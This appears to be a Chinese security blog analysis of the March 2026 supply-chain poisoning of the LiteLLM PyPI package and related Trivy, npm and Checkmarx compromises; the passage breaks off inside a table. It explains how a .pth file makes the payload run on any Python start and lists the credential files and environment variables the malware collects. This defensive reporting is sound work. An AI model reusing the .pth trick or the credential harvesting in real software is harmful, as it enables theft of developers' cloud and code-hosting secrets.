  <p>2026年3月24日，Python 生态最热门的 LLM 网关库 LiteLLM 遭遇供应链投毒攻击。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="font-size: 16px;display: flex;flex-flow: row;margin: 7px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: 20px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;background-color: rgb(67, 146, 117);box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;"><img class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100011141" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=1c4a1bc6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FuZT6kWW1jCktQJokHW2qviaRAzmaD6vQDt5RKWhoRSqyia2kFKYlL7to2WaTMfLA1DELQf2S8hVhZ7s9WGlTCDghuhWtniaxHcic2n5t6iarAd8U%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="font-size: 20px;line-height: 1;letter-spacing: 1px;padding: 0px 8px;text-align: justify;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">概述</span></b></p></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left-width: 3px;border-left-style: solid;border-left-color: rgb(67, 146, 117);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;border-bottom-width: 3px;border-bottom-style: solid;border-bottom-color: rgb(67, 146, 117);border-bottom-right-radius: 0px;padding: 0px 10px 10px 20px;box-sizing: border-box;"><div style="color: rgb(106, 106, 106);line-height: 1.8;letter-spacing: 1px;padding: 0px;text-align: justify;box-sizing: border-box;"><p class="s8" style="margin: 6px 0px;line-height: 1.44;font-family: Arial;text-align: left;text-indent: 0px;caret-color: rgb(0, 0, 0);color: rgb(0, 0, 0);font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-tap-highlight-color: rgba(26, 26, 26, 0.3);-webkit-text-size-adjust: none;-webkit-text-stroke-width: 0px;text-decoration-line: none;text-decoration-thickness: auto;text-decoration-style: solid;"><span style="font-size: 17px;"><span class="s7" style="line-height: 21.6px;font-family: Arial;">2026</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">年</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">3</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">月</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">24</span></span><span class="s7" style="line-height: 21.6px;font-family: Arial;"><span style="font-size: 17px;">日</span>，</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">Python</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">生态中主流的</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">LLM</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">网关软件</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">LiteLLM</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">遭遇供应链投毒攻击。攻击者</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">TeamPCP</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">利用窃取的官方仓库账号权限，在约</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">4</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">小时的窗口期内恶意发布了两个高危版本。此次攻击是该组织针对全球关键开发生态系统（包括</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">Trivy</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">、</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">npm</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">、</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">Checkmarx</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">、</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">OpenVSX</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">和</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">PyPI</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">）连续</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">5</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">天渗透行动的最新一环，影响范围已从基础软件开发延伸至</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">AI</span><span class="s7" style="font-size: 17px;line-height: 21.6px;font-family: Arial;">应用安全等多个核心领域。</span></p><p class="s9" style="margin: 6px 0px;line-height: 1.44;text-align: left;text-indent: 0px;caret-color: rgb(0, 0, 0);color: rgb(0, 0, 0);font-family: -webkit-standard;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-tap-highlight-color: rgba(26, 26, 26, 0.3);-webkit-text-size-adjust: none;-webkit-text-stroke-width: 0px;text-decoration-line: none;text-decoration-thickness: auto;text-decoration-style: solid;"><span style="font-size: 17px;"><span class="s7" style="line-height: 21.6px;font-family: Arial;">作为集成</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">100</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">余种大语言模型服务的统一接口，</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">LiteLLM</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">已成为</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">AI</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">应用开发的基础设施。其不仅月下载量高达</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">9500</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">万次，更被</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">CrewAI</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">、</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">DSPy</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">、</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">Browser-Use</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">及</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">Mem0</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">等主流</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">AI</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">框架深度依赖。这种广泛的渗透率意味着底层漏洞将产生剧烈的连锁反应：攻击者不仅能通过恶意代码窃取</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">AWS</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">云凭据、</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">GitHub</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">令牌、</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">Kubernetes</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">集群权限及加密货币钱包，还能以此为跳板横向渗透至</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">CI/CD</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">流水线与生产服务器，波及全球数百万开发者及企业用户。此事件极具破坏性，堪称</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">AI</span><span class="s7" style="line-height: 21.6px;font-family: Arial;">时代供应链攻击的典型案例。</span></span></p></div></div></div><div style="font-size: 16px;display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">01 攻击时间线</span></span></strong></p></div></div></div></div><div style="font-size: 16px;text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100011143" data-ratio="0.5" data-s="300,640" data-type="jpeg" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=a21a3657&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCkmuoDDRkm7FQVR2gAaeQ96Fq5ofoWWkAofe4YhkQPwU8mC95YnorHGj5p5xv522wZVdhD7U1UvbzkzCcPPn4JSgceltTxiaIVU%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div><div style="font-size: 16px;margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3月19日：Trivy 沦陷</span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span style="font-size: 16px;">攻击者使用窃取的凭据发布 </span><span style="font-size: 17px;">Trivy</span><span style="font-size: 16px;"> v0.69.4 恶意版本，强制推送 aquasecurity/trivy-action 的 76 个标签，并替换 aquasecurity/setup-trivy 的所有标签。恶意代码从 GitHub Runner 内存中提取凭据，加密后外泄到 </span></span><span style="font-size: 16px;background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">scan.aquasecurtiy[.]org</span></span><span leaf="" style="font-size: 16px;">（仿冒域名）。</span></p><div style="font-size: 16px;margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3月20-22日：npm 蠕虫传播</span></strong></p></div></div></div></div><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者部署自传播 npm 蠕虫 &#34;CanisterWorm&#34;，自动窃取 npm token、识别可发布包、修改版本号后重新发布。涉及 @EmilGroup（28 个包）、@opengov（16 个包）等多个组织域。针对伊朗系统的破坏性路径会删除主机文件系统。</span></p><div style="font-size: 16px;margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3月23日：Checkmarx 和 OpenVSX</span></strong></p></div></div></div></div><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">同样的攻击模式扩展到 Checkmarx/kics-github-action、Checkmarx/ast-github-action，以及 OpenVSX 扩展 ast-results (v2.53.0) 和 cx-dev-assist (v1.7.0)。</span></p><div style="font-size: 16px;margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3月24日：LiteLLM 投毒</span></strong></p></div></div></div></div><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者利用从 Trivy 攻击中获取的 CI/CD 凭据，入侵 LiteLLM 联合创始人 Krish Dholakia 的 GitHub 和 PyPI 账户，绕过官方发布流程直接向 PyPI 上传恶意包。</span></p><div style="font-size: 16px;display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">02 技术分析</span></span></strong></p></div></div></div></div><div style="font-size: 16px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: center;box-sizing: border-box;"><div style="margin: 0px 0px 4px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2.1 攻击向量</span></strong></p></div></div></div></div><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">LiteLLM 投毒事件的一个关键特征是攻击者未使用伪造包或拼写抢注，而是成功入侵了真实项目的 PyPI 发布权限。</span></p><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">入侵路径推测：</span></p><ol style="font-size: 16px;list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3月19日 Trivy 攻击窃取了 GitHub Actions 凭据</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">凭据可能被用于访问其他组织的 CI/CD 流程</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">通过 LiteLLM CEO 的账户绕过官方 CI/CD 直接发布到 PyPI</span></p></li></ol><div style="font-size: 16px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: center;box-sizing: border-box;"><div style="margin: 0px 0px 4px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2.2 恶意载荷分析</span></strong></p></div></div></div></div><div style="font-size: 16px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">两版本采用不同的触发机制：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">版本 1.82.7：</span></strong><span leaf="">恶意代码注入到 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">litellm/proxy/proxy_server.py</span></span><span leaf="">，仅在 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">import litellm.proxy</span></span><span leaf=""> 时触发。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">版本 1.82.8：</span></strong><span leaf="">新增 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">litellm_init.pth</span></span><span leaf=""> 文件，利用 Python site 模块在解释器启动时自动执行 .pth 文件中的可执行代码。这意味着只要安装了该包，任何 Python 进程启动都会触发恶意载荷，无需显式导入 LiteLLM。</span></p></div><div style="font-size: 16px;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;margin: 10px 0px;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;min-width: 5%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: center;box-sizing: border-box;"><div style="margin: 0px 0px 4px;box-sizing: border-box;"><div style="text-align: justify;color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2.3 攻击流程</span></strong></p></div></div></div></div><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">恶意载荷采用三阶段架构，每个阶段独立执行特定功能，可被攻击者远程更新和扩展。</span></p><div style="font-size: 16px;margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">阶段一：触发执行</span></strong></p></div></div></div></div><p style="font-size: 16px;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">技术亮点：</span></strong><span leaf="">v1.82.8 引入的 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">.pth</span></span><span leaf=""> 文件攻击方式极为隐蔽。</span></p><div style="font-size: 16px;text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;"><img class="rich_pages wxw-img" data-ratio="0.8092592592592592" data-s="300,640" data-type="jpeg" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100011144" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=e05aa3aa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCnJficKDOqMt2rVEZSa3IPCGZZ3kTKfaqLVaXv5FMke12Nb6rHKMCSRyk1ndSjsj6fA6y7YKPXhDkPtVMNp0VthkQqBoHyBlP5A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div><div style="font-size: 16px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">为什么 </span><strong style="box-sizing: border-box;"><span leaf="">.pth</span></strong><span leaf=""> 文件更危险？</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Python 的 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">site</span></span><span leaf=""> 模块在解释器启动时会自动处理 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">site-packages</span></span><span leaf=""> 目录下的 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">.pth</span></span><span leaf=""> 文件。如果 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">.pth</span></span><span leaf=""> 文件包含可执行代码（以 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">import</span></span><span leaf=""> 开头），这些代码会在任何 Python 程序启动时自动运行——即使用户从未显式导入 LiteLLM。这意味着：</span></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">开发者只是运行 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">python manage.py</span></span><span leaf=""> 或启动任意 Python 脚本，恶意代码就会执行</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可以感染开发环境、CI/CD runner、生产服务器——任何安装了该包的 Python 环境</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">无需社会工程诱导用户执行特定操作</span></p></li></ul></div><div style="font-size: 16px;margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">阶段二：凭据窃取</span></strong></p></div></div></div></div><p style="font-size: 16px;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">恶意载荷首先进行大规模凭据收集，覆盖云基础设施、开发工具和加密资产。</span></p><div style="font-size: 16px;text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;"><img class="rich_pages wxw-img" data-ratio="0.19074074074074074" data-s="300,640" data-type="jpeg" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;height: auto !important;" data-imgfileid="100011142" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=88bb912e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jClBoaGiclgrSRFGVHDDR6WnjicBapUtaHtST8XdcdufnZmRwxz9hWDF0ThekPJxeYvE3X1icgDcv5ibfn2m9dOgNQMribFbWYoXfwpw%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div><p style="font-size: 16px;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关键攻击目标：</span></p><div style="font-size: 16px;min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">凭据类型</span></strong></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">收集路径</span></strong></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击价值</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AWS 凭据</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">~/.aws/credentials</span></span><span leaf="">, 环境变量 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">AWS_*</span></span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">可访问云资源、部署恶意基础设施</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GitHub Token</span></p></div></div></td><td data-colwidth="45.0000%" width="45.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">环境变量 </span><span style="background-color: rgb(231, 231, 231);box-sizing: border-box;"><span leaf="">GITHUB_TOKEN, .env</span></span></p></div></div></td><td data-colwidth="21.8100%" width="21.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 